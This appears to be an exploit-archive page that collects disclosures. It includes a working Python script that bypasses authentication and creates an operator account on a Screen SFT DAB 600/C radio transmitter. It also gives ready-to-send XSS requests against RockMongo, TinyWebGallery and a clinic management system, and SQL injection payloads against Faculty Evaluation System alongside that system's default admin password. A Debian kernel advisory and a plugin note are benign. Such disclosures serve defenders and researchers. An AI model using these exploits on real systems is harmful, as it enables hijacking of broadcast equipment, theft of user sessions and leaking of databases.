Screen SFT DAB 600/C suffers from a weak session management that can allow an attacker on the same network to bypass these controls by reusing the same IP address assigned to the victim user (NAT) and exploit crucial operations on the device itself. By abusing the IP address property that is binded to the Session ID, one needs to await for such an established session and issue unauthorized requests to the vulnerable API to manage and/or manipulate the affected transmitter.

    #!/usr/bin/env python3### Screen SFT DAB 600/C Authentication Bypass Account Creation Exploit### Vendor: DB Elettronica Telecomunicazioni SpA# Product web page: https://www.screen.it | https://www.dbbroadcast.com#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/# Affected version: Firmware: 1.9.3#                   Bios firmware: 7.1 (Apr 19 2021)#                   Gui: 2.46#                   FPGA: 169.55#                   uc: 6.15## Summary: Screen's new radio DAB Transmitter is reaching the highest# technology level in both Digital Signal Processing and RF domain.# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the# digital adaptive precorrection and configuatio flexibility, the Hot# Swap System technology, the compactness and the smart system design,# the SFT DAB are advanced transmitters. They support standards DAB,# DAB+ and T-DMB and are compatible with major headend brands.## Desc: The application suffers from a weak session management that can# allow an attacker on the same network to bypass these controls by reusing# the same IP address assigned to the victim user (NAT) and exploit crucial# operations on the device itself. By abusing the IP address property that# is binded to the Session ID, one needs to await for such an established# session and issue unauthorized requests to the vulnerable API to manage# and/or manipulate the affected transmitter.## Tested on: Keil-EWEB/2.1#            MontaVista® Linux® Carrier Grade eXpress (CGX)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2023-5771# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php### 19.03.2023#import hashlib,datetime##########import requests,colorama#########from colorama import Fore, Style#colorama.init()print(Fore.RED+Style.BRIGHT+    '''██████  ███████ ███    ███ ██ ███    ██ ██████  ███████ ██████  ██   ██ ██      ████  ████ ██ ████   ██ ██   ██ ██      ██   ██ ██████  █████   ██ ████ ██ ██ ██ ██  ██ ██   ██ █████   ██████  ██   ██ ██      ██  ██  ██ ██ ██  ██ ██ ██   ██ ██      ██   ██ ██   ██ ███████ ██      ██ ██ ██   ████ ██████  ███████ ██   ██     '''    +Style.RESET_ALL)print(Fore.WHITE+Style.BRIGHT+    '''            ZSL and the Producers insist that no one           submit any exploits of themselfs or others              performing any dangerous activities.                 We will not open or view them.    '''    +Style.RESET_ALL)s=datetime.datetime.now()s=s.strftime('%d.%m.%Y %H:%M:%S')print('Starting API XPL -',s)t=input('Enter transmitter ip: ')u=input('Enter desired username: ')p=input('Enter desired password: ')e='/system/api/userManager.cgx'm5=hashlib.md5()m5.update(p.encode('utf-8'))h=m5.hexdigest()print('Your sig:',h)print('Calling object: ssbtObj')print('CGX fastcall: userManager::newUser')t='http://'+t+ebh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',    'Accept':'application/json, text/plain, */*',    'Accept-Language':'ku-MK,en;q=0.9',    'Accept-Encoding':'gzip, deflate',    'User-Agent':'Dabber++',    'Connection':'close'}j={'ssbtIdx':0,   'ssbtType':'userManager',   'ssbtObj':{             'newUser':{                       'password':h,                       'type':'OPERATOR',                       'username':u                       }             },   }r=requests.post(t,headers=bh,json=j)if r.status_code==200:    print('Done.')else:    print('Error')exit(-5)

Screen SFT DAB 600/C Authentication Bypass / Account Creation

RockMongo version 1.1.7 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)# Discovery by: Rafael Pedrero# Discovery Date: 2020-09-19# Vendor Homepage: https://github.com/iwind/rockmongo/# Software Link : https://github.com/iwind/rockmongo/# Tested Version: 1.1.7# Tested on:  Windows 7 and 10# Vulnerability Type: Stored Cross-Site Scripting (XSS)CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: RockMongo v1.1.7, does not sufficiently encodeuser-controlled inputs, resulting in a stored and reflected Cross-SiteScripting (XSS) vulnerability via the index.php, in multiple parameter.Proof of concept:Stored:POST https://localhost/mongo/index.php?action=db.newCollection&db=localHTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 69Origin: https://localhostConnection: keep-aliveReferer: https://localhost/mongo/index.php?action=db.newCollection&db=localCookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es;rock_format=jsonUpgrade-Insecure-Requests: 1Host: localhostname=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0Reflected:https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_loghttps://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3Ehttps://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3Ehttp://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAllhttp://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAllhttp://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAllPOST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 109Origin: https://localhostAuthorization: Basic cm9vdDpyb290Connection: keep-aliveReferer: https://localhost/mongo/index.php?action=login.index&host=0Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;rock_format=jsonUpgrade-Insecure-Requests: 1Host: localhostmore=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 109Origin: https://localhostAuthorization: Basic cm9vdDpyb290Connection: keep-aliveReferer: https://localhost/mongo/index.php?action=server.command&Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;rock_format=jsonUpgrade-Insecure-Requests: 1Host: localhostcommand=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=jsonPOST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 140Origin: https://localhostAuthorization: Basic cm9vdDpyb290Connection: keep-aliveReferer: https://localhost/mongo/index.php?action=server.execute&Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;rock_format=jsonUpgrade-Insecure-Requests: 1Host: localhostcode=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

RockMongo 1.1.7 Cross Site Scripting

TinyWebGallery version 2.5 suffers from a persistent cross site scripting vulnerability.

    #Exploit Title: TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)#Application: TinyWebGallery#Version: v2.5#Bugs:  Stored Xss#Technology: PHP#Vendor URL: http://www.tinywebgallery.com/#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest#Date of found: 07-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux 2. Technical Details & POC========================================steps: 1. Login to account2. Go to http://localhost/twg25/index.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg3. Edit 4. Set folder name section as  <script>alert(4)</script>Request :POST /twg25/i_frames/i_titel.php HTTP/1.1Host: localhostContent-Length: 264Cache-Control: max-age=0sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/twg25/i_frames/i_titel.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpgAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766kConnection: closetwg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg&twg_foffset=&twg_submit=true&twg_titel_page2=true&twg_foldername_mod=1&twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B&twg_folderdesc_mod=1&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save5. Go to http://localhost/twg25/index.php

TinyWebGallery 2.5 Cross Site Scripting

Debian Linux Security Advisory 5402-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5402-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
May 13, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-0386 CVE-2023-31436 CVE-2023-32233

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-0386

    It was discovered that under certain conditions the overlayfs  
    filesystem implementation did not properly handle copy up  
    operations. A local user permitted to mount overlay mounts in user  
    namespaces can take advantage of this flaw for local privilege  
    escalation.

CVE-2023-31436

    Gwangun Jung reported a a flaw causing heap out-of-bounds read/write  
    errors in the traffic control subsystem for the Quick Fair Queueing  
    scheduler (QFQ) which may result in information leak, denial of  
    service or privilege escalation.

CVE-2023-32233

    Patryk Sondej and Piotr Krysiuk discovered a use-after-free flaw in  
    the Netfilter nf_tables implementation when processing batch  
    requests, which may result in local privilege escalation for a user  
    with the CAP_NET_ADMIN capability in any user or network namespace.

For the stable distribution (bullseye), these problems have been fixed in  
version 5.10.179-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmRfblBfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0S/ehAAimoZ2PphbMF53apge94ZKEnKKG2k43nEIDBumQsa8tFCmVxHKrxTV+qo  
2OnkmuXO2W7kexlHNtnHfKie7pYI+0vLrxNQqyBBDHfUAvUC7cvVgZUG+O+K9v+r  
TY60UJBkVwW3bY99MUMtwSsy0pN7dHqc/YQTWacPYSVuZ/GRn5/PLhDu9p6vdROD  
BxYtcGF93I0EfGgjCqPZ16rivCwtIck4/GaQCBgypDa2N0h92Y/uTEebaA3LEC72  
DuiJc1kPHpecGe11Xay1+KVt0q3CjwAxbjj740t/ySn+OzGqbSRpLk5IIsLuZL8F  
hh+tsB3PDTpO9yOVNokO7h0wlja03uVFyddwPf8jkv0fsFo26OTkl1aISA6/gmT2  
hymNBwPs5OAxX2f7Fe9jwHllBlLCb+xwiejBcrdNUMOsG2Krd7B5ABlj4shQPylQ  
9NxPHgk9GrCjBFcRaCPoQBaIw5AT7R3Rv7xkyH/XzlXCvuckiJlZMwIw7AVDnRtv  
orZ42xSxaZu1AyIVv48f2JinLrLTBIjj7BQrzq5M+9SXL3bGbv9ChzwoxSK7STc4  
UJ13fZxmQbC50c0xmT1VbiYDIeE85cCOkuF+Heyqw3vJioFFl9tHEt8GT1FrHoUl  
9IcX1l0CB62Sh7s8jdFnvSVur5ZfZbXyUIxWeNIHrF9PinQsVJY=  
=sqnY  
-----END PGP SIGNATURE-----

Debian Security Advisory 5402-1

Online Clinic Management System version 2.2 suffers from multiple persistent cross site scripting vulnerabilities.

# Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)  
# Date: 27-06-2019  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: https://bigprof.com  
# Software Download Link :  
https://bigprof.com/appgini/applications/online-clinic-management-system  
# Version : 2.2  
# Category: Webapps  
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits  
# CVE :  
# Category: webapps

# Vulnerability Type: Stored Cross-Site Scripting

1. Description

Online Clinic Management System 2.2, does not sufficiently encode  
user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)  
vulnerability via the /clinic/medical_records_view.php, in FirstRecord  
parameter, GET and POST request.

2. Proof of Concept

GET:  
http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

POST:  
POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Content-Type: multipart/form-data;  
boundary=---------------------------1512016725878  
Content-Length: 1172  
Origin: https://127.0.0.1  
Connection: keep-alive  
Referer: https://127.0.0.1/clinic/medical_records_view.php  
Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4;  
online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22]  
Upgrade-Insecure-Requests: 1  
Host: 127.0.0.1

-----------------------------1512016725878  
Content-Disposition: form-data; name="current_view"

DVP  
-----------------------------1512016725878  
Content-Disposition: form-data; name="SortField"

-----------------------------1512016725878  
Content-Disposition: form-data; name="SelectedID"

1  
-----------------------------1512016725878  
Content-Disposition: form-data; name="SelectedField"

-----------------------------1512016725878  
Content-Disposition: form-data; name="SortDirection"

-----------------------------1512016725878  
Content-Disposition: form-data; name="FirstRecord"

"><script>alert(1);</script>  
-----------------------------1512016725878  
Content-Disposition: form-data; name="NoDV"

-----------------------------1512016725878  
Content-Disposition: form-data; name="PrintDV"

-----------------------------1512016725878  
Content-Disposition: form-data; name="DisplayRecords"

all  
-----------------------------1512016725878  
Content-Disposition: form-data; name="patient"

-----------------------------1512016725878  
Content-Disposition: form-data; name="SearchString"

-----------------------------1512016725878--

1. Description

Online Clinic Management System 2.2, does not sufficiently encode  
user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)  
vulnerability via the /clinic/patients_view.php, in FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

And Reflected Cross-Site Scripting (XSS) too.  
# Vulnerability Type: Reflected Cross-Site Scripting

1. Description

Online Clinic Management System 2.2, does not sufficiently encode  
user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)  
vulnerability via the /clinic/events_view.php, in FirstRecord parameter.

2. Proof of Concept

http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

1. Description

Online Clinic Management System 2.2, does not sufficiently encode  
user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)  
vulnerability via the /clinic/disease_symptoms_view.php, in FirstRecord  
parameter.

2. Proof of Concept

http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

Online Clinic Management System 2.2 Cross Site Scripting

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_class.php?id=.

Permalink

Cannot retrieve contributors at this time

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: acmglz

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/admin/manage\_class.php?id=

Vulnerability location: /eval/admin/manage\_class.php?id=, id

dbname =evaluation\_db

\[+\] Payload: /eval/admin/manage\_class.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /eval/admin/manage\_class.php?id\=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-31845: bug_report/SQLi-4.md at main · acmglz/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_subject.php?id=.

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: acmglz

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/admin/manage\_subject.php?id=

Vulnerability location: /eval/admin/manage\_subject.php?id=, id

dbname =evaluation\_db

\[+\] Payload: /eval/admin/manage\_subject.php?id=2%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /eval/admin/manage\_subject.php?id\=2%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-31844: bug_report/SQLi-3.md at main · acmglz/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/index.php?page=edit_faculty&id=.

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: acmglz

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/index.php?page=edit\_faculty&id=

Vulnerability location: /eval/index.php?page=edit\_faculty&id=, id

dbname =evaluation\_db

\[+\] Payload: /eval/index.php?page=edit\_faculty&id=-1%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /eval/index.php?page\=edit\_faculty&id\=\-1%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-31842: bug_report/SQLi-2.md at main · acmglz/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/view_faculty.php?id=.

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: acmglz

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/admin/view\_faculty.php?id=

Vulnerability location: /eval/admin/view\_faculty.php?id=, id

dbname =evaluation\_db

\[+\] Payload: /eval/admin/view\_faculty.php?id=-1%20union%20select%201,2,3,4,database(),6,7,8,9--+ // Leak place ---> id

GET /eval/admin/view\_faculty.php?id\=\-1%20union%20select%201,2,3,4,database(),6,7,8,9\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-31843: bug_report/SQLi-1.md at main · acmglz/bug_report

The Ad Inserter WordPress plugin before 2.7.27 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present

Tag

#php